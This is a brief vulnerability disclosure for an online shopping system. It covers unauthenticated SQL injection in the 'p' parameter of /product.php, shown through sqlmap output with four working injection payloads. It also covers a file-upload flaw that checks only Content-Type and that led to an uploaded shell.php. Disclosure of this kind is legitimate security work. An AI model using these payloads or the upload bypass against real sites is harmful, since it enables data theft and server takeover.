SQL Injection & affected by Arbitrary File Upload

[LoveCppp]

SQL Injection

The online-shopping-system is vulnerable to un-authenticated error/boolean-based blind & error based SQL Injection attacks.

The p parameter on the /product.php page does not sanitize the user input, an attacker can extract sensisitive data from the underlying MySQL Database.
Poc's
SQLMAP PAYLOADS
p parameter on the /product.php page
pocs

GET parameter 'p' is vulnerable. Do you want to keep testing the others (if any)
? [y/N]

sqlmap identified the following injection point(s) with a total of 58 HTTP(s) re
quests:
---
Parameter: p (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=72 AND 2037=2037

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (FLOOR)
    Payload: p=72 AND (SELECT 1432 FROM(SELECT COUNT(*),CONCAT(0x7178707671,(SEL
ECT (ELT(1432=1432,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=72 AND (SELECT 2289 FROM (SELECT(SLEEP(5)))LMdY)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: p=72 UNION ALL SELECT CONCAT(0x7178707671,0x4b71516d647848537741636
571634e5a416a6a7a716367744d47654778554952467778625161716f,0x716b6a6a71),NULL,NUL
L,NULL,NULL,NULL,NULL,NULL-- -
---
[20:26:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP, PHP 5.5.9
back-end DBMS: MySQL >= 5.0

affected by Arbitrary File Upload

affected by Arbitrary File Upload at add_products line 22,Only verified Content-Type，so ,can modify Content-Type:

image/jpeg

filepath is ../product_images/1635249699_shell.php